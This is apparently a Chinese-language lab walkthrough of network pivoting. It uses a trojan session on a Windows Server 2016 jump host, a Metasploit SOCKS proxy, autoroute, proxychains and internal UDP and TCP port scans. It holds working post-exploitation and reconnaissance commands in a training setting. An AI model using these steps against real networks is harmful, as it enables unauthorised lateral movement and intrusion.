首先创建好木马,然后上传到代理服务器
使用命令background让木马在后台执行
然后使用命令search proxy,选择使用use 115
使用show options看看需要配置啥东西,经过分析,不需要进行配置
然后再run之前确定Kali无法访问2007的80端口
然后run,使用jobs命令发现代理服务器运行了
先去浏览器上看看能不能访问,结果还是无法访问
所以我们尝试着在浏览器里面配置一个代理
发现还是无法访问
我们可以去确认一下,使用netstat -antp和netstat -antp tcp这两个命令看看Kali和Window2016跳板机的1080端口是否开放着
经过对比,所以配置给浏览器配置代理是在Kali这边的
当然我们也不能确定是代理没有开对的问题,先在windows2016上去访问一下,发现可以进行访问,所以问题出在了代理上了
那这个时候我们该怎么办
我们先在msf的内部将其搞定
在我们的msf提示命令下是可以使用系统命令的
在我们配置好代理之后使用以下模块去扫描一下IP地址,看看可不可以扫一点东西出来
use auxiliary/scanner/discovery/udp_sweep
set rhosts 192.168.209.0/24
set threads 50
run
接下来我们换一种方式,去配置Linux的全局代理
修改之前我们再去确认一下192.168.209.129无法访问,已经确认无法访问了
修改一下/etc/proxychains4.conf配置文件
使用命令vi /etc/proxychains4.conf去修改
在最后一行加上socks5 127.0.0.1 1080即可
配置完之后该如何使用呢
执行以下命令
proxychains curl http://192.168.209.129/dashboard/phpinfo.php
结果如下,发现还是失败了
使用命令sessions -i 1返回到meterpreter
然后把路由给加上
run autoroute -s 192.168.209.0/24
run autoroute -s 192.168.3.0/24
确认一下路由已经存在了
路由和代理都存在
我们试着重新去访问一下,发现可以进行访问了
通过内网的路由再配合着代理就可以实现了,添加路由的目的:做了代理,攻击机kali借助windows2016这个代理服务器实现访问内网,但是呢,如果只有代理没有路由的话,流量只能出去不能回来,无法形成闭环,所以也就无法进行访问,因为Kali可以通过做windows2016这个跳板机去访问windows7.但是windows7是无法去访问Kali的 (之前进行内网扫描了端口转发并配了路由。配路由的目的是,在进行扫描时,使得流量出去了还可以回来,这样才能实现有去有回。而且,只有路由没有端口转发也无法实现内网的访问有端口转发没有路由攻击机只能访问被做了端口转发的内网主机,比如这里的win server2016)
我们再进行复盘一下
我们将/etc/proxychains4.conf中的新加的那一条给注释掉
我们再来运行以下这条命令,发现无法成功访问
proxychains curl http://192.168.209.129/dashboard/phpinfo.php
这条命令的意思是如果我们前面加了proxychains,后边的命令会跟着我们的代理路线去访问了
这是在命令行使用代理的手段
它告诉我们没有代理可以找到,但是我们的浏览器可以进行访问,浏览器能够访问的原因是我们在浏览器本身上配置了代理,所以是可以进行正常访问的
因为我们发现了一些主机,所以我们去扫端口
使用portscan这个辅助模块去帮助我们扫,通过tcp去扫描比较靠谱一点
当然也可以使用postscan去扫描单个端口,然后进行操作
search portscan
use 5
set rhosts 192.168.209.129
set threads 20
set ports 20-500
run
接下来我们发现有一个Web服务器,那我们就继续在这里面对它进行扫描,开始扫后台